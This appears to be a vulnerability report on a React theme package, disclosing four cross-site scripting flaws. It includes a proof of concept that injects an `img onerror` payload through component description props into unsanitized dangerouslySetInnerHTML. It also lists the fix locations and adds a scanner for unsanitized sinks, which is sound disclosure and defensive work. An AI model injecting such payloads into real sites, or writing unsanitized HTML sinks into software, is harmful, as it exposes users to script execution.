Open
Description
Hi, I've found four Cross-Site Scripting (XSS) vulnerabilities in the theme package.
Vulnerability Details:
- Severity: High/Critical
- Description: There's a risk of malicious script execution when the input to components is controlled by an adversary.
Steps to Reproduce:
```jsx
import React from "react";
import ReactDOM from "react-dom/client";
import {
  PageContainer,
  CheckoutContainer,
  IndexContainer,
  SharedContainer,
} from "theme";

function App() {
  return (
    <div>
      {/* The description strings below reach dangerouslySetInnerHTML unsanitized */}
      <PageContainer
        state={{
          productDetails: {
            description: `<img src='' onerror=alert(1)`,
          },
        }}
      />
      <CheckoutContainer
        state={{
          pageDetails: {
            description: `<img src='' onerror=alert(1)`,
          },
        }}
      />
    </div>
  );
}

const root = ReactDOM.createRoot(document.getElementById("root"));
root.render(<App />);
```
Suggested Fix or Mitigation:
Sanitize the HTML before rendering with dangerouslySetInnerHTML. To fix all four vulnerabilities, sanitize the HTML at the following locations:
- components/checkoutSuccess.js line 117
- containers/index.js line 32
- components/productDetails/index.js line 21
- containers/page.js line 32
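A way to keep the four locations above from regressing after the fix, as an added example that is not part of the original issue or the theme's code: a heuristic text scan that reports every `dangerouslySetInnerHTML` sink whose `__html` value is not a single call to an allowlisted sanitizer. Assumptions: the fix wraps values in `DOMPurify.sanitize` or a hypothetical local `sanitizeHtml` helper, and the sample sources are constructed.

```javascript
// Call names assumed to return sanitized HTML (assumption, not the theme's API).
const SANITIZERS = ["DOMPurify.sanitize", "sanitizeHtml"];

// Index of the bracket closing the one at `open`, or -1 if unbalanced.
function matchClose(text, open, o, c) {
  let depth = 0;
  for (let i = open; i < text.length; i++) {
    if (text[i] === o) depth++;
    else if (text[i] === c && --depth === 0) return i;
  }
  return -1;
}

// True only if the whole expression is a single call to an allowlisted sanitizer.
function isSanitized(expr) {
  return SANITIZERS.some((fn) => expr.startsWith(fn + "(") &&
    matchClose(expr, fn.length, "(", ")") === expr.length - 1);
}

// Report every dangerouslySetInnerHTML sink whose __html value is not sanitized.
function findUnsanitizedSinks(filename, src) {
  const findings = [];
  const sink = /dangerouslySetInnerHTML\s*=\s*\{/g;
  let m;
  while ((m = sink.exec(src)) !== null) {
    const open = m.index + m[0].length - 1; // "{" opening the JSX expression
    const close = matchClose(src, open, "{", "}");
    const body = close === -1 ? "" : src.slice(open + 1, close);
    const html = /__html\s*:\s*([\s\S]*?)\s*,?\s*\}\s*$/.exec(body);
    const value = html ? html[1].trim() : null; // null: needs manual review
    if (value === null || !isSanitized(value)) {
      findings.push({ filename, line: src.slice(0, m.index).split("\n").length, value });
    }
  }
  return findings;
}

// Constructed sample sources (not the theme's real files).
const SAMPLES = {
  "raw.js": "const Raw = ({ state }) => (\n" +
    "  <div dangerouslySetInnerHTML={{ __html: state.pageDetails.description }} />\n);",
  "clean.js": "const Clean = ({ state }) => (\n  <div dangerouslySetInnerHTML={{\n" +
    "    __html: DOMPurify.sanitize(state.pageDetails.description),\n  }} />\n);",
};

const auditSamples = () =>
  Object.entries(SAMPLES).flatMap(([name, src]) => findUnsanitizedSinks(name, src));
```

The scan works on source text rather than a parsed syntax tree, so braces inside string literals can confuse it; treat a finding with `value: null` as a sink to review by hand.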